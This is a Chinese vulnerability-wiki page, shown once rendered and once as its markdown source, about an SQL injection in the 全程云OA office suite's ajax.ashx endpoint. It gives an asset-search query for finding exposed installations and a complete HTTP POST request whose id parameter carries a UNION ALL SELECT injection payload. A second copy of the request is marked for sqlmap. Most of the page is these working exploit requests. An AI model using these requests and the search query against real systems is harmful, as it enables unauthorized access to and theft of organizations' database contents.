fofamini-wiki

登录白背景

源码

全程云OA ajax存在SQL注入漏洞

一、漏洞简介

全程云OA是一种一体化协同办公软件，旨在为企业内部协同办公管理提供高效的软件解决方案。它以公文流管理为核心，将企业日常公文数据在信息数据链上及时、准确地反映出来，为部门人员提供简单快捷的日常办公支持，为部门经理和决策者提供企业内部资源数据支持，全程云OA ajax存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

全程云OA

三、资产测绘

hunterapp.name=="全程 OA"
特征

四、漏洞复现

POST /OA/common/mod/ajax.ashx HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=cfqsbxmiiyoxyl4hvejbfqmi
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 562

dll=DispartSell_Core.dll&class=DispartSell_Core.BaseData.DrpDataManager&method=GetProductById&id=66 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(112)+CHAR(122)+CHAR(113)+ISNULL(CAST(111*111 AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rifA

sqlmap

POST /OA/common/mod/ajax.ashx HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=cfqsbxmiiyoxyl4hvejbfqmi
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 562

dll=DispartSell_Core.dll&class=DispartSell_Core.BaseData.DrpDataManager&method=GetProductById&id=66

原文: https://www.yuque.com/xiaokp7/ocvun2/ykqr65w353gw4vev

# 全程云OA ajax存在SQL注入漏洞

# 一、漏洞简介
全程云OA是一种一体化协同办公软件，旨在为企业内部协同办公管理提供高效的软件解决方案。它以公文流管理为核心，将企业日常公文数据在信息数据链上及时、准确地反映出来，为部门人员提供简单快捷的日常办公支持，为部门经理和决策者提供企业内部资源数据支持，全程云OA ajax存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

# 二、影响版本

- 全程云OA

# 三、资产测绘

- hunter`app.name=="全程 OA"`
- 特征

![image.png](./img/GAUFGuKXlAgDUcZZ/1700640984358-a266e229-6493-40f0-b36f-e2d6670a26c9-835362.png)

# 四、漏洞复现
```
POST /OA/common/mod/ajax.ashx HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=cfqsbxmiiyoxyl4hvejbfqmi
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 562

dll=DispartSell_Core.dll&class=DispartSell_Core.BaseData.DrpDataManager&method=GetProductById&id=66 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(112)+CHAR(122)+CHAR(113)+ISNULL(CAST(111*111 AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(122)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- rifA
```
![image.png](./img/GAUFGuKXlAgDUcZZ/1700641018609-8b219764-7213-4fdf-a7ad-293e6c8db97c-384734.png)
sqlmap
```
POST /OA/common/mod/ajax.ashx HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: ASP.NET_SessionId=cfqsbxmiiyoxyl4hvejbfqmi
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 562

dll=DispartSell_Core.dll&class=DispartSell_Core.BaseData.DrpDataManager&method=GetProductById&id=66 
```
![image.png](./img/GAUFGuKXlAgDUcZZ/1700641215603-3c231062-1a06-4dfc-971d-9bd65a2693e9-498659.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ykqr65w353gw4vev>